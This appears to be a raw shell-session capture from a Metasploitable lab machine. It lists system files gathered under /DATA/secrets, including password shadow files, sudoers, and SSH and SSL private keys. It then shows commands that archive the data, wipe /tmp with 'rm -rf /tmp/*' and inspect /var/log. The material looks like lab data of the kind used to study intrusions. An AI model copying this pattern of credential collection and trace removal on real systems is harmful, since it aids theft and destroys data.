/DATA/secrets/python/debian_config

22
/DATA/secrets/sudoers

36
/DATA/secrets/zsh_command_not_found

25
/DATA/secrets/magic.mime

19
/DATA/secrets/vim/

29
/DATA/secrets/vim/vimrc.tiny

24
/DATA/secrets/vim/vimrc

24
/DATA/secrets/security/

65
/DATA/secrets/security/opasswd
/DATA/secrets/security/group.conf

35
/DATA/secrets/security/access.conf

36
/DATA/secrets/security/pam_env.conf

33
/DATA/secrets/security/time.conf

38
/DATA/secrets/security/namespace.init

38
/DATA/secrets/security/namespace.conf

35
/DATA/secrets/security/limits.conf

23
/DATA/secrets/event.d/

26
/DATA/secrets/event.d/rcS

33
/DATA/secrets/event.d/rc-default

26
/DATA/secrets/event.d/rc3

27
/DATA/secrets/event.d/tty5

41
/DATA/secrets/event.d/control-alt-delete

26
/DATA/secrets/event.d/rc0

30
/DATA/secrets/event.d/sulogin

27
/DATA/secrets/event.d/tty3

246
/DATA/secrets/event.d/tty4
/DATA/secrets/event.d/tty2
/DATA/secrets/event.d/rc6
/DATA/secrets/event.d/rc2
/DATA/secrets/event.d/rcS-sulogin
/DATA/secrets/event.d/logd
/DATA/secrets/event.d/rc4
/DATA/secrets/event.d/tty1
/DATA/secrets/event.d/rc5

26
/DATA/secrets/event.d/rc1

1448
/DATA/secrets/event.d/tty6
/DATA/secrets/firefox-3.0/
/DATA/secrets/firefox-3.0/pref/
/DATA/secrets/firefox-3.0/pref/firefox.js
/DATA/secrets/firefox-3.0/profile/
/DATA/secrets/firefox-3.0/profile/localstore.rdf
/DATA/secrets/firefox-3.0/profile/mimeTypes.rdf
/DATA/secrets/firefox-3.0/profile/chrome/
/DATA/secrets/firefox-3.0/profile/chrome/userChrome-example.css
/DATA/secrets/firefox-3.0/profile/chrome/userContent-example.css
/DATA/secrets/firefox-3.0/profile/prefs.js
/DATA/secrets/firefox-3.0/profile/bookmarks.html
/DATA/secrets/environment
/DATA/secrets/java/
/DATA/secrets/java/security/
/DATA/secrets/java/security/security.d/
/DATA/secrets/java/security/security.d/1000-gnu.java.security.provider.Gnu
/DATA/secrets/java/security/security.d/1002-gnu.javax.crypto.jce.GnuSasl
/DATA/secrets/java/security/security.d/1003-gnu.javax.net.ssl.provider.Jessie
/DATA/secrets/java/security/security.d/1004-gnu.javax.security.auth.callback.GnuCallbacks
/DATA/secrets/java/security/security.d/1001-gnu.javax.crypto.jce.GnuCrypto
/DATA/secrets/java/security/classpath.security
/DATA/secrets/adjtime
/DATA/secrets/shadow-
/DATA/secrets/rc.local
/DATA/secrets/hdparm.conf
/DATA/secrets/ftpusers
/DATA/secrets/popularity-contest.conf
/DATA/secrets/mediaprm
/DATA/secrets/mke2fs.conf
/DATA/secrets/rc0.d/
/DATA/secrets/rc0.d/README
/DATA/secrets/rc0.d/K50proftpd
/DATA/secrets/rc0.d/K20distcc
/DATA/secrets/rc0.d/K21mysql
/DATA/secrets/rc0.d/K25hwclock.
1015
sh
/DATA/secrets/rc0.d/S32portmap
/DATA/secrets/rc0.d/K22mysql-ndb
/DATA/secrets/rc0.d/K20openbsd-inetd
/DATA/secrets/rc0.d/K20postfix
/DATA/secrets/rc0.d/S60umountroot
/DATA/secrets/rc0.d/S90halt
/DATA/secrets/rc0.d/S31umountnfs.sh
/DATA/secrets/rc0.d/K59mountoverflowtmp
/DATA/secrets/rc0.d/K23mysql-ndb-mgm
/DATA/secrets/rc0.d/K20xinetd
/DATA/secrets/rc0.d/S40umountfs
/DATA/secrets/rc0.d/K10tomcat5.5
/DATA/secrets/rc0.d/K39ufw
/DATA/secrets/rc0.d/S15wpa-ifupdown
/DATA/secrets/rc0.d/K09apache2
/DATA/secrets/rc0.d/K85bind9
/DATA/secrets/rc0.d/K80nfs-kernel-server
/DATA/secrets/rc0.d/K21postgresql-8.3
/DATA/secrets/rc0.d/K20nfs-common
/DATA/secrets/rc0.d/S30urandom
/DATA/secrets/rc0.d/S20sendsigs
/DATA/secrets/rc0.d/K19samba
/DATA/secrets/devscripts.conf
/DATA/secrets/ufw/
/DATA/secrets/ufw/sysctl.conf
/DATA/secrets/ufw/after6.rules
/DATA/secrets/ufw/before6.rules
/DATA/secrets/ufw/before.rules
/DATA/secrets/ufw/ufw.conf
/DATA/secrets/ufw/after.rules
/DATA/secrets/esound/
/DATA/secrets/esound/esd.conf

20
/DATA/secrets/menu/

26
/DATA/secrets/menu/README

22
/DATA/secrets/mailcap

21
/DATA/secrets/rc2.d/

27
/DATA/secrets/rc2.d/README

1030
/DATA/secrets/rc2.d/S11klogd
/DATA/secrets/rc2.d/S17portmap
/DATA/secrets/rc2.d/S20nfs-common
/DATA/secrets/rc2.d/S10sysklogd
/DATA/secrets/rc2.d/S16ssh
/DATA/secrets/rc2.d/S20distcc
/DATA/secrets/rc2.d/S50proftpd
/DATA/secrets/rc2.d/S20samba
/DATA/secrets/rc2.d/S15bind9
/DATA/secrets/rc2.d/S20snmpd
/DATA/secrets/rc2.d/S10xserver-xorg-input-wacom
/DATA/secrets/rc2.d/S99rc.local
/DATA/secrets/rc2.d/S18mysql-ndb
/DATA/secrets/rc2.d/S99rmnologin
/DATA/secrets/rc2.d/S20rsync
/DATA/secrets/rc2.d/S20xinetd
/DATA/secrets/rc2.d/S91apache2
/DATA/secrets/rc2.d/S89atd
/DATA/secrets/rc2.d/S17mysql-ndb-mgm
/DATA/secrets/rc2.d/S89cron
/DATA/secrets/rc2.d/S19mysql
/DATA/secrets/rc2.d/S20openbsd-inetd
/DATA/secrets/rc2.d/S90tomcat5.5
/DATA/secrets/rc2.d/S19postgresql-8.3
/DATA/secrets/rc2.d/S20postfix
/DATA/secrets/rc2.d/S20nfs-kernel-server
/DATA/secrets/python2.5/
/DATA/secrets/python2.5/sitecustomize.py
/DATA/secrets/localtime
/DATA/secrets/opt/
/DATA/secrets/syslog.conf
/DATA/secrets/iproute2/
/DATA/secrets/iproute2/rt_protos

99
/DATA/secrets/iproute2/rt_realms
/DATA/secrets/iproute2/rt_scopes
/DATA/secrets/iproute2/rt_tables

34
/DATA/secrets/iproute2/rt_dsfield

34
/DATA/secrets/iproute2/ematch_map

25
/DATA/secrets/mime.types

19
/DATA/secrets/ssl/

27
/DATA/secrets/ssl/private/

48
/DATA/secrets/ssl/private/ssl-cert-snakeoil.key

25
/DATA/secrets/ssl/certs/

79
/DATA/secrets/ssl/certs/1f4bb285
/DATA/secrets/ssl/certs/ssl-cert-snakeoil.pem

30
/DATA/secrets/ssl/openssl.cnf

27
/DATA/secrets/logrotate.d/

39
/DATA/secrets/logrotate.d/mysql-server

44
/DATA/secrets/logrotate.d/postgresql-common

62
/DATA/secrets/logrotate.d/ppp
/DATA/secrets/logrotate.d/samba

35
/DATA/secrets/logrotate.d/aptitude

33
/DATA/secrets/logrotate.d/distcc

31
/DATA/secrets/logrotate.d/dpkg

34
/DATA/secrets/logrotate.d/apache2

30
/DATA/secrets/logrotate.d/apt

37
/DATA/secrets/logrotate.d/wpa_action

29
/DATA/secrets/console-setup/

52
/DATA/secrets/console-setup/compose.ISO-8859-11.inc

51
/DATA/secrets/console-setup/compose.ISO-8859-8.inc

47
/DATA/secrets/console-setup/compose.CP1251.inc

48
/DATA/secrets/console-setup/compose.IBM1133.inc

52
/DATA/secrets/console-setup/compose.ISO-8859-14.inc

48
/DATA/secrets/console-setup/compose.TIS-620.inc

51
/DATA/secrets/console-setup/compose.ISO-8859-3.inc

51
/DATA/secrets/console-setup/compose.ISO-8859-9.inc

51
/DATA/secrets/console-setup/compose.ISO-8859-6.inc

51
/DATA/secrets/console-setup/compose.ISIRI-3342.inc

47
/DATA/secrets/console-setup/compose.KOI8-U.inc

50
/DATA/secrets/console-setup/compose.ARMSCII-8.inc

52
/DATA/secrets/console-setup/compose.GEORGIAN-PS.inc

52
/DATA/secrets/console-setup/compose.ISO-8859-15.inc

57
/DATA/secrets/console-setup/compose.GEORGIAN-ACADEMY.inc

52
/DATA/secrets/console-setup/compose.ISO-8859-16.inc

47
/DATA/secrets/console-setup/compose.KOI8-R.inc

51
/DATA/secrets/console-setup/compose.ISO-8859-2.inc

52
/DATA/secrets/console-setup/compose.ISO-8859-10.inc

51
/DATA/secrets/console-setup/compose.ISO-8859-1.inc

47
/DATA/secrets/console-setup/compose.VISCII.inc

52
/DATA/secrets/console-setup/compose.ISO-8859-13.inc

47
/DATA/secrets/console-setup/compose.CP1256.inc

45
/DATA/secrets/console-setup/boottime.kmap.gz

51
/DATA/secrets/console-setup/compose.ISO-8859-5.inc

47
/DATA/secrets/console-setup/compose.CP1255.inc

47
/DATA/secrets/console-setup/Lat15-VGA16.psf.gz

51
/DATA/secrets/console-setup/compose.ISO-8859-7.inc

51
/DATA/secrets/console-setup/compose.ISO-8859-4.inc

26
/DATA/secrets/postgresql/

30
/DATA/secrets/postgresql/8.3/

35
/DATA/secrets/postgresql/8.3/main/

48
/DATA/secrets/postgresql/8.3/main/pg_ident.conf

50
/DATA/secrets/postgresql/8.3/main/postgresql.conf

46
/DATA/secrets/postgresql/8.3/main/environment

46
/DATA/secrets/postgresql/8.3/main/pg_hba.conf

45
/DATA/secrets/postgresql/8.3/main/start.conf

23
/DATA/secrets/hostname

28
/DATA/secrets/blkid.tab.old

23
/DATA/secrets/ucf.conf

28
/DATA/secrets/mailcap.order

26
/DATA/secrets/idmapd.conf

27
/DATA/secrets/deluser.conf

19
/DATA/secrets/w3m/

26
/DATA/secrets/w3m/mailcap

25
/DATA/secrets/w3m/config

23
/DATA/secrets/default/

26
/DATA/secrets/default/rcS

27
/DATA/secrets/default/halt

30
/DATA/secrets/default/ntpdate

40
/DATA/secrets/default/nfs-kernel-server

33
/DATA/secrets/default/nfs-common

28
/DATA/secrets/default/bind9

29
/DATA/secrets/default/xinetd

28
/DATA/secrets/default/samba

29
/DATA/secrets/default/distcc

30
/DATA/secrets/default/useradd

61
/DATA/secrets/default/tomcat5.5
/DATA/secrets/default/locale

172
/DATA/secrets/default/syslogd
/DATA/secrets/default/proftpd
/DATA/secrets/default/tmpfs
/DATA/secrets/default/apache2
/DATA/secrets/default/ufw
/DATA/secrets/default/snmpd

36
/DATA/secrets/default/console-setup

31
/DATA/secrets/default/bootlogd

28
/DATA/secrets/default/klogd

29
/DATA/secrets/default/devpts

26
/DATA/secrets/default/ssh

30
/DATA/secrets/default/portmap

28
/DATA/secrets/default/rsync

25
/DATA/secrets/profile.d/

24
/DATA/secrets/blkid.tab

20
/DATA/secrets/sgml/

49
/DATA/secrets/sgml/libcommons-validator-java.cat

27
/DATA/secrets/sgml/catalog

31
/DATA/secrets/sgml/catalog.old

20
/DATA/secrets/hosts

27
/DATA/secrets/locale.alias

20
/DATA/secrets/issue

19
/DATA/secrets/X11/

32
/DATA/secrets/X11/app-defaults/

38
/DATA/secrets/X11/app-defaults/XClock

43
/DATA/secrets/X11/app-defaults/Clock-color

40
/DATA/secrets/X11/app-defaults/XFontSel

37
/DATA/secrets/X11/app-defaults/XLoad

37
/DATA/secrets/X11/app-defaults/XCalc

164
/DATA/secrets/X11/app-defaults/XLogo
/DATA/secrets/X11/app-defaults/XTerm-color
/DATA/secrets/X11/app-defaults/UXTerm
/DATA/secrets/X11/app-defaults/Xmessage-color

40
/DATA/secrets/X11/app-defaults/Xditview

40
/DATA/secrets/X11/app-defaults/XConsole

245
/DATA/secrets/X11/app-defaults/Xmessage
/DATA/secrets/X11/app-defaults/XClock-color
/DATA/secrets/X11/app-defaults/XMore
/DATA/secrets/X11/app-defaults/Xman
/DATA/secrets/X11/app-defaults/Xedit-color
/DATA/secrets/X11/app-defaults/Editres-color

124
/DATA/secrets/X11/app-defaults/KOI8RXTerm
/DATA/secrets/X11/app-defaults/Xmag
/DATA/secrets/X11/app-defaults/Xditview-chrtr

42
/DATA/secrets/X11/app-defaults/XClipboard

40
/DATA/secrets/X11/app-defaults/Xvidtune

37
/DATA/secrets/X11/app-defaults/Xedit

43
/DATA/secrets/X11/app-defaults/XCalc-color

43
/DATA/secrets/X11/app-defaults/XLogo-color

39
/DATA/secrets/X11/app-defaults/Editres

35
/DATA/secrets/X11/app-defaults/XSm

37
/DATA/secrets/X11/app-defaults/XTerm

35
/DATA/secrets/X11/app-defaults/Xfd

39
/DATA/secrets/X11/app-defaults/Viewres

20
/DATA/secrets/X11/X

60
/DATA/secrets/X11/Xwrapper.config
/DATA/secrets/X11/rgb.txt

30
/DATA/secrets/X11/Xresources/

40
/DATA/secrets/X11/Xresources/x11-common

28
/DATA/secrets/X11/xorg.conf

25
/DATA/secrets/X11/fonts/

32
/DATA/secrets/X11/fonts/100dpi/

51
/DATA/secrets/X11/fonts/100dpi/xfonts-100dpi.alias

31
/DATA/secrets/X11/fonts/75dpi/

49
/DATA/secrets/X11/fonts/75dpi/xfonts-75dpi.alias

31
/DATA/secrets/X11/fonts/Type1/

52
/DATA/secrets/X11/fonts/Type1/xfonts-scalable.scale

30
/DATA/secrets/X11/fonts/misc/

47
/DATA/secrets/X11/fonts/misc/xfonts-base.alias

35
/DATA/secrets/X11/Xsession.options

25
/DATA/secrets/X11/xinit/

32
/DATA/secrets/X11/xinit/xinitrc

34
/DATA/secrets/X11/xinit/xserverrc

30
/DATA/secrets/X11/Xsession.d/

55
/DATA/secrets/X11/Xsession.d/20x11-common_process-args

53
/DATA/secrets/X11/Xsession.d/40x11-common_xsessionrc

53
/DATA/secrets/X11/Xsession.d/30x11-common_xresources

60
/DATA/secrets/X11/Xsession.d/50x11-common_determine-startup

52
/DATA/secrets/X11/Xsession.d/90x11-common_ssh-agent

48
/DATA/secrets/X11/Xsession.d/99x11-common_start

27
/DATA/secrets/X11/fluxbox/

40
/DATA/secrets/X11/fluxbox/menudefs.hook

31
/DATA/secrets/X11/fluxbox/keys

38
/DATA/secrets/X11/fluxbox/window.menu

31
/DATA/secrets/X11/fluxbox/apps

44
/DATA/secrets/X11/fluxbox/fluxbox.menu-user

46
/DATA/secrets/X11/fluxbox/system.fluxbox-menu

31
/DATA/secrets/X11/fluxbox/init

34
/DATA/secrets/X11/fluxbox/overlay

39
/DATA/secrets/X11/fluxbox/fluxbox-menu

27
/DATA/secrets/X11/xserver/

41
/DATA/secrets/X11/xserver/SecurityPolicy

23
/DATA/secrets/X11/xkb/

68
/DATA/secrets/X11/xkb/keymap.dir
/DATA/secrets/X11/xkb/keycodes.dir

29
/DATA/secrets/X11/xkb/keymap

189
/DATA/secrets/X11/xkb/keycodes
/DATA/secrets/X11/xkb/symbols
/DATA/secrets/X11/xkb/types.dir
/DATA/secrets/X11/xkb/compat
/DATA/secrets/X11/xkb/semantics.dir
/DATA/secrets/X11/xkb/base.xml

31
/DATA/secrets/X11/xkb/geometry

217
/DATA/secrets/X11/xkb/types
/DATA/secrets/X11/xkb/rules
/DATA/secrets/X11/xkb/symbols.dir
/DATA/secrets/X11/xkb/semantics
/DATA/secrets/X11/xkb/geometry.dir
/DATA/secrets/X11/xkb/compat.dir
/DATA/secrets/X11/Xsession

20
/DATA/secrets/bind/

28
/DATA/secrets/bind/db.local

28
/DATA/secrets/bind/rndc.key

27
/DATA/secrets/bind/db.root

36
/DATA/secrets/bind/named.conf.local

24
/DATA/secrets/bind/db.0

30
/DATA/secrets/bind/named.conf

28
/DATA/secrets/bind/db.empty

33
/DATA/secrets/bind/zones.rfc1918

26
/DATA/secrets/bind/db.255

38
/DATA/secrets/bind/named.conf.options

26
/DATA/secrets/bind/db.127

18
/DATA/secrets/jvm

30
/DATA/secrets/kernel-img.conf

21
/DATA/secrets/groff/

30
/DATA/secrets/groff/man.local

31
/DATA/secrets/groff/mdoc.local

24
/DATA/secrets/terminfo/

30
/DATA/secrets/terminfo/README

44
/DATA/secrets/shells
/DATA/secrets/mailname

19
/DATA/secrets/ssh/

39
/DATA/secrets/ssh/ssh_host_rsa_key.pub

35
/DATA/secrets/ssh/ssh_host_rsa_key

39
/DATA/secrets/ssh/ssh_host_dsa_key.pub

35
/DATA/secrets/ssh/ssh_host_dsa_key

29
/DATA/secrets/ssh/ssh_config

25
/DATA/secrets/ssh/moduli

30
/DATA/secrets/ssh/sshd_config

21
/DATA/secrets/passwd

27
/DATA/secrets/cowpoke.conf

22
/DATA/secrets/at.deny

26
/DATA/secrets/hosts.equiv

21
/DATA/secrets/pam.d/

35
/DATA/secrets/pam.d/common-account

24
/DATA/secrets/pam.d/atd

25
/DATA/secrets/pam.d/cron

25
/DATA/secrets/pam.d/sshd

24
/DATA/secrets/pam.d/rsh

26
/DATA/secrets/pam.d/other

24
/DATA/secrets/pam.d/ppp

24
/DATA/secrets/pam.d/ftp

36
/DATA/secrets/pam.d/common-password

25
/DATA/secrets/pam.d/sudo

35
/DATA/secrets/pam.d/common-session

32
/DATA/secrets/pam.d/common-auth

23
/DATA/secrets/pam.d/su

28
/DATA/secrets/pam.d/proftpd

27
/DATA/secrets/pam.d/rlogin

25
/DATA/secrets/pam.d/chfn

25
/DATA/secrets/pam.d/chsh

26
/DATA/secrets/pam.d/login

26
/DATA/secrets/pam.d/rexec

27
/DATA/secrets/pam.d/passwd

23
/DATA/secrets/timezone

22
/DATA/secrets/unreal/

30
/DATA/secrets/unreal/modules/

39
/DATA/secrets/unreal/modules/m_list.so

38
/DATA/secrets/unreal/modules/m_map.so

39
/DATA/secrets/unreal/modules/m_pass.so

202
/DATA/secrets/unreal/modules/m_whowas.so
/DATA/secrets/unreal/modules/m_motd.so
/DATA/secrets/unreal/modules/m_silence.so
/DATA/secrets/unreal/modules/m_nachat.so
/DATA/secrets/unreal/modules/m_svso.so

42
/DATA/secrets/unreal/modules/m_addline.so

332
/DATA/secrets/unreal/modules/m_addmotd.so
/DATA/secrets/unreal/modules/m_addomotd.so
/DATA/secrets/unreal/modules/m_sendumode.so
/DATA/secrets/unreal/modules/m_rping.so
/DATA/secrets/unreal/modules/m_svspart.so
/DATA/secrets/unreal/modules/m_connect.so
/DATA/secrets/unreal/modules/m_stats.so
/DATA/secrets/unreal/modules/m_part.so

39
/DATA/secrets/unreal/modules/m_nick.so

41
/DATA/secrets/unreal/modules/m_invite.so

42
/DATA/secrets/unreal/modules/m_botmotd.so

41
/DATA/secrets/unreal/modules/commands.so

38
/DATA/secrets/unreal/modules/m_tkl.so

44
/DATA/secrets/unreal/modules/m_adminchat.so

45
/DATA/secrets/unreal/modules/m_svssilence.so

43
/DATA/secrets/unreal/modules/m_svsnolag.so

39
/DATA/secrets/unreal/modules/m_time.so

41
/DATA/secrets/unreal/modules/m_lusers.so

42
/DATA/secrets/unreal/modules/m_wallops.so

40
/DATA/secrets/unreal/modules/m_tsctl.so

42
/DATA/secrets/unreal/modules/m_chghost.so

39
/DATA/secrets/unreal/modules/m_user.so

43
/DATA/secrets/unreal/modules/m_opermotd.so

42
/DATA/secrets/unreal/modules/m_sethost.so

43
/DATA/secrets/unreal/modules/m_mkpasswd.so

44
/DATA/secrets/unreal/modules/m_svslusers.so

39
/DATA/secrets/unreal/modules/m_kick.so

39
/DATA/secrets/unreal/modules/m_help.so

38
/DATA/secrets/unreal/modules/m_lag.so

44
/DATA/secrets/unreal/modules/m_undccdeny.so

42
/DATA/secrets/unreal/modules/m_unzline.so

40
/DATA/secrets/unreal/modules/m_watch.so

43
/DATA/secrets/unreal/modules/m_svswatch.so

41
/DATA/secrets/unreal/modules/m_samode.so

43
/DATA/secrets/unreal/modules/m_svsfline.so

38
/DATA/secrets/unreal/modules/cloak.so

42
/DATA/secrets/unreal/modules/m_svskill.so

38
/DATA/secrets/unreal/modules/m_who.so

42
/DATA/secrets/unreal/modules/m_chatops.so

40
/DATA/secrets/unreal/modules/m_admin.so

287
/DATA/secrets/unreal/modules/m_guest.so
/DATA/secrets/unreal/modules/m_umode2.so
/DATA/secrets/unreal/modules/m_chgname.so
/DATA/secrets/unreal/modules/m_ison.so
/DATA/secrets/unreal/modules/m_swhois.so
/DATA/secrets/unreal/modules/m_sapart.so
/DATA/secrets/unreal/modules/m_pingpong.so

452
/DATA/secrets/unreal/modules/m_svsnline.so
/DATA/secrets/unreal/modules/m_sqline.so
/DATA/secrets/unreal/modules/m_sdesc.so
/DATA/secrets/unreal/modules/m_userip.so
/DATA/secrets/unreal/modules/m_sendsno.so
/DATA/secrets/unreal/modules/m_dccdeny.so
/DATA/secrets/unreal/modules/m_htm.so
/DATA/secrets/unreal/modules/m_svsnoop.so
/DATA/secrets/unreal/modules/m_names.so
/DATA/secrets/unreal/modules/m_sajoin.so
/DATA/secrets/unreal/modules/m_message.so

43
/DATA/secrets/unreal/modules/m_unsqline.so

41
/DATA/secrets/unreal/modules/m_server.so

42
/DATA/secrets/unreal/modules/m_setname.so

39
/DATA/secrets/unreal/modules/m_mode.so

39
/DATA/secrets/unreal/modules/m_kill.so

43
/DATA/secrets/unreal/modules/m_chgident.so

42
/DATA/secrets/unreal/modules/m_unkline.so

42
/DATA/secrets/unreal/modules/m_netinfo.so

40
/DATA/secrets/unreal/modules/m_sjoin.so

43
/DATA/secrets/unreal/modules/m_userhost.so

40
/DATA/secrets/unreal/modules/m_cycle.so

43
/DATA/secrets/unreal/modules/m_dccallow.so

40
/DATA/secrets/unreal/modules/m_knock.so

42
/DATA/secrets/unreal/modules/m_svsjoin.so

39
/DATA/secrets/unreal/modules/m_away.so

39
/DATA/secrets/unreal/modules/m_oper.so

40
/DATA/secrets/unreal/modules/m_topic.so

40
/DATA/secrets/unreal/modules/m_close.so

43
/DATA/secrets/unreal/modules/m_setident.so

41
/DATA/secrets/unreal/modules/m_locops.so

42
/DATA/secrets/unreal/modules/m_svsmotd.so

43
/DATA/secrets/unreal/modules/m_protoctl.so

41
/DATA/secrets/unreal/modules/m_rakill.so

40
/DATA/secrets/unreal/modules/m_rules.so

40
/DATA/secrets/unreal/modules/m_trace.so

42
/DATA/secrets/unreal/modules/m_svsmode.so

42
/DATA/secrets/unreal/modules/m_globops.so

40
/DATA/secrets/unreal/modules/m_squit.so

40
/DATA/secrets/unreal/modules/m_links.so

41
/DATA/secrets/unreal/modules/m_svssno.so

40
/DATA/secrets/unreal/modules/m_whois.so

39
/DATA/secrets/unreal/modules/m_join.so

40
/DATA/secrets/unreal/modules/m_vhost.so

40
/DATA/secrets/unreal/modules/m_akill.so

42
/DATA/secrets/unreal/modules/m_svsnick.so

39
/DATA/secrets/unreal/modules/m_quit.so

38
/DATA/secrets/unreal/modules/m_eos.so

40
/DATA/secrets/unreal/badwords.quit.conf

31
/DATA/secrets/unreal/networks/

47
/DATA/secrets/unreal/networks/l33t-irc.network

44
/DATA/secrets/unreal/networks/lcirc.network

49
/DATA/secrets/unreal/networks/globalchat.network

49
/DATA/secrets/unreal/networks/global-irc.network

52
/DATA/secrets/unreal/networks/unitedirc-org.network

38
/DATA/secrets/unreal/networks/makenet

47
/DATA/secrets/unreal/networks/infinity.network

56
/DATA/secrets/unreal/networks/awesomechristians.network

49
/DATA/secrets/unreal/networks/ircsystems.network

47
/DATA/secrets/unreal/networks/darkkaos.network

46
/DATA/secrets/unreal/networks/thainet.network

46
/DATA/secrets/unreal/networks/bunker7.network

47
/DATA/secrets/unreal/networks/phazenet.network

48
/DATA/secrets/unreal/networks/gamescafe.network

51
/DATA/secrets/unreal/networks/german-elite.network

49
/DATA/secrets/unreal/networks/digitalirc.network

46
/DATA/secrets/unreal/networks/cabonet.network

43
/DATA/secrets/unreal/networks/isno.network

45
/DATA/secrets/unreal/networks/axenet.network

50
/DATA/secrets/unreal/networks/dragonwings.network

43
/DATA/secrets/unreal/networks/ctcp.network

47
/DATA/secrets/unreal/networks/template.network

50
/DATA/secrets/unreal/networks/unreal-test.network

51
/DATA/secrets/unreal/networks/chatuniverse.network

431
/DATA/secrets/unreal/networks/discussioni.network
/DATA/secrets/unreal/networks/outsiderz.network
/DATA/secrets/unreal/networks/burnnet.network
/DATA/secrets/unreal/networks/icechat.network
/DATA/secrets/unreal/networks/zirc.network
/DATA/secrets/unreal/networks/chatcrap.network
/DATA/secrets/unreal/networks/x-irc.network
/DATA/secrets/unreal/networks/stormdancing.network
/DATA/secrets/unreal/networks/german-global-irc.network

998
/DATA/secrets/unreal/networks/networks.ndx
/DATA/secrets/unreal/networks/wazzza.network
/DATA/secrets/unreal/Donation
/DATA/secrets/unreal/aliases/
/DATA/secrets/unreal/aliases/auspice.conf
/DATA/secrets/unreal/aliases/generic.conf
/DATA/secrets/unreal/aliases/cygnus.conf
/DATA/secrets/unreal/aliases/genericstats.conf
/DATA/secrets/unreal/aliases/aliases.conf
/DATA/secrets/unreal/aliases/operstats.conf
/DATA/secrets/unreal/aliases/ircservices.conf
/DATA/secrets/unreal/aliases/epona.conf
/DATA/secrets/unreal/aliases/anope.conf
/DATA/secrets/unreal/dccallow.conf
/DATA/secrets/unreal/ircd.tune
/DATA/secrets/unreal/unrealircd.conf
/DATA/secrets/unreal/badwords.message.conf
/DATA/secrets/unreal/LICENSE
/DATA/secrets/unreal/doc/
/DATA/secrets/unreal/doc/coding-guidelines
/DATA/secrets/unreal/doc/Authors
/DATA/secrets/unreal/doc/example.conf
/DATA/secrets/unreal/doc/unreal32docs.html
/DATA/secrets/unreal/doc/tao.of.irc
/DATA/secrets/unreal/tmp/
/DATA/secrets/unreal/tmp/45EFED56.commands.so

43
/DATA/secrets/unreal/tmp/BEE3989E.cloak.so

30
/DATA/secrets/unreal/ircd.log

31
/DATA/secrets/unreal/help.conf

43
/DATA/secrets/unreal/badwords.channel.conf

37
/DATA/secrets/unreal/spamfilter.conf

118
/DATA/secrets/unreal/curl-ca-bundle.crt
/DATA/secrets/unreal/unreal
/DATA/secrets/unreal/ircd.pid
/DATA/secrets/group

33
/DATA/secrets/bash_completion.d/

36
/DATA/secrets/bash_completion.d/pon

49
/DATA/secrets/bash_completion.d/apache2.2-common

50
/DATA/secrets/bash_completion.d/devscripts.chdist

38
/DATA/secrets/bash_completion.d/quilt

40
/DATA/secrets/bash_completion.d/debconf

26
/DATA/secrets/xinetd.conf

	4
pwd

2
/

	19
ls -al SUWtHEh.tar

57
-rw-r--r-- 1 root root 33167360 Mar  4 14:13 SUWtHEh.tar

	8
ls /tmp

23
4453.jsvc_up
a
a.c
run

	14
rm -rf /tmp/*

	8
ls /tmp

	12
ls -al /tmp

253
total 20
drwxrwxrwt  4 root root 4096 Mar  4 14:16 .
drwxr-xr-x 22 root root 4096 Mar  4 14:13 ..
drwxrwxrwt  2 root root 4096 Mar  4  2018 .ICE-unix
-r--r--r--  1 root root   11 Mar  4  2018 .X0-lock
drwxrwxrwt  2 root root 4096 Mar  4  2018 .X11-unix

	16
ls -al /var/log

1024
total 12576
drwxr-xr-x 14 root     root        4096 Mar  4 14:18 .
drwxr-xr-x 15 root     root        4096 May 20  2012 ..
drwxr-x---  2 root     adm         4096 Mar  1 06:36 apache2
drwxr-xr-x  2 root     root        4096 Apr  7  2008 apparmor
drwxr-xr-x  2 root     root        4096 Feb  9 06:39 apt
-rw-r--r--  1 syslog   adm        60872 Mar  4 14:17 auth.log
-rw-r--r--  1 root     root           0 May 21  2012 boot
-rw-rw-r--  1 root     utmp         384 Mar  1 14:03 btmp
-rw-rw-r--  1 root     utmp           0 Feb  9 06:39 btmp.1
-rw-r--r--  1 syslog   adm       605993 Mar  4 14:03 daemon.log
-rw-r--r--  1 syslog   adm       103756 Mar  4  2018 debug
drwxr-xr-x  2 root     root        4096 Apr 22  2008 dist-upgrade
-rw-r--r--  1 root     adm        15752 Mar  4  2018 dmesg
-rw-r--r--  1 root     adm        15753 Mar  4  2018 dmesg.0
-rw-r--r--  1 root     adm         5936 Mar  4  2018 dmesg.1.gz
-rw-r--r--  1 root     adm         5990 Mar  4  2018 dmesg.2.gz
-rw-r--r--  1 root     adm         6000 Mar  4
1024
 13:59 dmesg.3.gz
-rw-r--r--  1 root     adm         6062 Mar  1 14:32 dmesg.4.gz
-rw-r-----  1 root     adm            0 Feb  9 06:39 dpkg.log
-rw-r--r--  1 root     root       88201 May 20  2012 dpkg.log.1
drwxr-xr-x  2 root     root        4096 Mar 16  2010 fsck
drwxr-xr-x  3 root     root        4096 Mar 16  2010 installer
-rw-r--r--  1 syslog   adm       550102 Mar  4 13:36 kern.log
-rw-r--r--  1 root     root      293168 Mar  4 14:11 lastlog
-rw-r--r--  1 syslog   adm            0 May 20  2012 lpr.log
-rw-r--r--  1 syslog   adm            0 May 20  2012 mail.err
-rw-r-----  1 syslog   adm         8791 Mar  4  2018 mail.info
-rw-r-----  1 syslog   adm      1260055 Feb 13 06:28 mail.info.0
-rw-r-----  1 syslog   adm         8791 Mar  4  2018 mail.log
-rw-r-----  1 syslog   adm      1260055 Feb 13 06:28 mail.log.0
-rw-r--r--  1 syslog   adm       286357 Feb 13 06:20 mail.warn
-rw-r--r--  1 syslog   adm       124450 Mar  4 14:01 messages
-rw-r--r--  1 root     root     7413760 Mar  4 14:18 metasploitable_lo
998
gs_SUWtHEh.tar
drwxr-s---  2 mysql    adm         4096 Mar 17  2010 mysql
drwxr-sr-x  2 news     news        4096 Mar 16  2010 news
drwxrwxr-t  2 root     postgres    4096 Mar  1 06:36 postgresql
drwxr-xr-x  2 root     root        4096 Mar  1 06:52 proftpd
drwxr-x---  2 root     adm         4096 Mar  1 06:36 samba
-rw-r-----  1 syslog   adm       239324 Mar  4 14:17 syslog
-rw-r-----  1 syslog   adm        81650 Mar  1 06:34 syslog.0
-rw-r-----  1 syslog   adm        26223 Feb 13 06:44 syslog.1.gz
-rw-r-----  1 syslog   adm        26806 Feb 12 06:30 syslog.2.gz
-rw-r-----  1 syslog   adm        30211 Feb  9 06:39 syslog.3.gz
drwxr-x---  2 tomcat55 adm         4096 Dec  7  2008 tomcat5.5
-rw-r--r--  1 root     root      284565 Mar  4  2018 udev
-rw-r--r--  1 syslog   adm            1 Mar  1 18:26 user.log
